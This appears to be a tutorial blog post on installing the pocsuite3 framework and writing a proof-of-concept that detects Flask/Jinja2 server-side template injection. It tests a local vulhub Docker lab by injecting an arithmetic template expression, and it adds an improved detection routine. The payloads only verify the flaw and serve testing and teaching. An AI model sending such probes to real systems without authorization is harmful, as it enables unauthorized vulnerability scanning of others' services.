Knownsec's pocsuite3 has been updated.
https://github.com/knownsec/pocsuite3
一、Installation
Install Python 3.4 or later, then:
pip3 install pocsuite3
After installation, type pocsuite in the console; if the output looks like the following, the installation succeeded.
二、PoC test
Write a very simple PoC that tests for the Flask SSTI vulnerability:
```python
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, requests


class DemoPOC(POCBase):
    vulID = '111'
    version = '3.0'
    author = ['liao']
    vulDate = '2017-12-14'
    createDate = '2017-12-14'
    updateDate = '2017-12-14'
    references = ['https://github.com/vulhub/vulhub/tree/master/flask/ssti']
    name = 'Flask(Jinja2) SSTI'
    appPowerLink = ''
    appName = 'flask'
    appVersion = '1.x'
    vulType = 'SSTI'
    desc = '''
    Flask server-side template injection
    '''
    samples = []
    install_requires = []

    def _verify(self):
        result = {}
        # The vulhub app renders the `name` query parameter straight into a
        # Jinja2 template, so an arithmetic expression is evaluated server-side.
        url = urljoin(self.url, "/?name=")
        payload = "{{22*22}}"
        try:
            resp = requests.get(url + payload)
            # "484" is only produced if Jinja2 actually evaluated 22*22
            if resp and resp.status_code == 200 and "484" in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception:
            # network error or timeout: report as not vulnerable
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        # This demo has no separate exploitation step; attack mode reuses the check
        return self._verify()


register_poc(DemoPOC)
```
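The fixed probe above has a weak spot: any page that happens to contain the digits 484 (a price, an ID, a byte count) is reported as vulnerable. The following is an added example, not code from the original post or from pocsuite3: it rebuilds the verification step with random operands, requires the product to appear as a standalone number, and treats a verbatim echo of the payload as not vulnerable. It uses only the standard library so it runs without pocsuite3; the base URL, the `name` parameter and the sample response bodies are assumptions modelled on the vulhub Flask app, and `probe_target` is the only function that touches the network.

```python
import random
import re
from urllib.parse import quote, urljoin
from urllib.request import urlopen


def make_probe():
    """Return (payload, expected) for one SSTI probe.

    Two random four-digit operands give a 7-8 digit product, so the
    expected string is very unlikely to occur in a normal page by chance.
    """
    a = random.randint(1000, 9999)
    b = random.randint(1000, 9999)
    return "{{%d*%d}}" % (a, b), str(a * b)


def build_probe_url(base_url, payload, param="name"):
    """Place the payload in the query parameter the vulhub app renders.

    The braces and '*' are percent-encoded so the URL is unambiguous;
    Flask decodes them before the template is rendered. The parameter
    name `name` is an assumption taken from the vulhub app.
    """
    return urljoin(base_url, "/") + "?" + param + "=" + quote(payload)


def is_ssti(body, payload, expected):
    """Decide from a response body whether the template was evaluated.

    Vulnerable only if the product appears as a whole number (not as part
    of a longer digit run) and the raw payload was not simply echoed back.
    """
    if payload in body:
        # Reflected verbatim: the input was escaped or inserted as data,
        # not rendered as a template.
        return False
    return re.search(r"(?<!\d)" + re.escape(expected) + r"(?!\d)", body) is not None


def probe_target(base_url, timeout=5):
    """Send one probe to a lab target and return (vulnerable, url)."""
    payload, expected = make_probe()
    url = build_probe_url(base_url, payload)
    with urlopen(url, timeout=timeout) as resp:  # plain HTTP to a lab target
        body = resp.read().decode("utf-8", "replace")
    return is_ssti(body, payload, expected), url


if __name__ == "__main__":
    # Constructed response bodies in the shape the vulhub app produces.
    payload, expected = make_probe()
    rendered = "<h1>Hello %s</h1>" % expected   # Jinja2 evaluated the expression
    echoed = "<h1>Hello %s</h1>" % payload      # input reflected without rendering
    print(build_probe_url("http://127.0.0.1:8000", payload))
    print("rendered ->", is_ssti(rendered, payload, expected))
    print("echoed   ->", is_ssti(echoed, payload, expected))
```

Dropping this into the `_verify` method above means replacing the fixed `payload`/"484" pair with `make_probe()` and the substring check with `is_ssti(resp.text, payload, expected)`; the rest of the PoC class is unchanged.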
三、Set up a local vulnerable environment for testing
Use docker to set up the Flask test environment (the vulhub directory below ships a docker-compose.yml; run `docker-compose up -d` in it and the app listens on port 8000):
https://github.com/vulhub/vulhub/tree/master/flask/ssti
四、Run the PoC
Run the PoC directly from the command line, pointing it at the target, e.g. `pocsuite -r flask_ssti.py -u http://127.0.0.1:8000 --verify` (`--attack` selects the `_attack` method instead).
This is only a very simple demo; pocsuite3 is far more capable, see the pocsuite3 documentation for more.